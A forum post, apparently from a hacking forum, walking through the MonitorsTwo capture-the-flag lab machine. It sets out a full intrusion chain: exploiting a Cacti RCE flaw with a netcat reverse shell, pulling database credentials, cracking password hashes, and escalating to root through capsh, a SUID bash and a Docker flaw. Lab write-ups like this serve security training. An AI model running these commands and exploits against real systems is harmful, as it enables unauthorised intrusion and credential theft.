• We are an English-only forum. Selling threads should have samples, or permanent ban.

MonitorsTwo Walkthrough

thejester

Second Lieutenant
RaidForum.co
Joined
May 31, 2023
Messages
1
Reaction score
0
Credits
0
User
First we start with a rustscan scan to find open ports:
```
Open 10.10.11.211:22
Open 10.10.11.211:80
```

Two ports are open, visting the web server shows a Cacti server. The Cacti version is shown on the application
Version: 1.2.22

This is vulnerable to an unauthenticated RCE exploit: CVE-2022-46169

Download and use the following script to get RCE: https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

1. open a netcat listener
nc -lnvp 1234
2. Run the exploit
python3 expl.py -u http://10.10.11.211/ --LHOST=<localip> --LPORT=1234

Now you have a shell as www-data, reading the /var/www/html/include/config.php file we can find the mysql database login credentials which are "root:root"

We can login to the mysql database to find 2 users with their hashes (I used chisel to create a reverse proxy and open the mysql locally):
Table: user_auth
admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

Running JTR with rockyou.txt we can crack marcus' password:
marcus:funkymonkey

These credentials also work with the SSH login.

Root
Now you have SSH'ed to the box as "marcus"

Reading marcus' mail we find an admin explaining a few vulnerabilities
cat /var/mail/marcus

The one we need to exploit to gain root access is CVE-2021-41091, which exploits the docker container running on the host.

But before we can use CVE-2021-41091, we need to first turn the /bin/bash file on the docker container into an SUID binary with chmod s+u /bin/bash

To do this, gain access to the docker container with the Cacti exploit from above, find that the 'capsh' file is an SUID binary, use this to gain root access on the docker container:
capsh --gid=0 --uid=0 -- (https://gtfobins.github.io/gtfobins/capsh/)

Now add the SUID bit to the bash binary:
chmod s+u /bin/bash

Now we can use the CVE-2021-41091 exploit on the host machine- https://github.com/UncleJ4ck/CVE-2021-41091

This will exploit the docker container and we can now run the /bin/bash binary from the container with -p (so it doesnt drop privileges)

/var/lib/docker/overlay2/<HASH>/merged/bin/bash -p

~ pwned ~
 
Back
Top Bottom